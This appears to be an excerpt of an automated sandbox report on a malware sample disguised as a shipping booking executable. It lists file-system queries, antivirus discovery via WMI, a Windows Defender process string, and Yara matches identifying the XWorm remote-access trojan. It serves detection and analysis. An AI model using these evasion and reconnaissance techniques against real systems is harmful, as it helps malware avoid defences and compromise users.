Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4190479980.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4218271165.0000000006AE0000.00000004.00000020.00020000.00000000.sdmp, FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4218271165.0000000006B0A000.00000004.00000020.00020000.00000000.sdmp, FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4190479980.0000000000F06000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 11.2.BhTdjGetAH.exe.288d464.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.BhTdjGetAH.exe.2878b80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.BhTdjGetAH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.31210c4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.310c7e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.31210c4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.310c7e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.30162b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1844167553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2211516335.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1767946178.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1839980652.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BhTdjGetAH.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BhTdjGetAH.exe PID: 7996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2132, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 11.2.BhTdjGetAH.exe.288d464.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.BhTdjGetAH.exe.2878b80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.BhTdjGetAH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.XClient.exe.31210c4.0.unpack, type: UNPACKEDPE
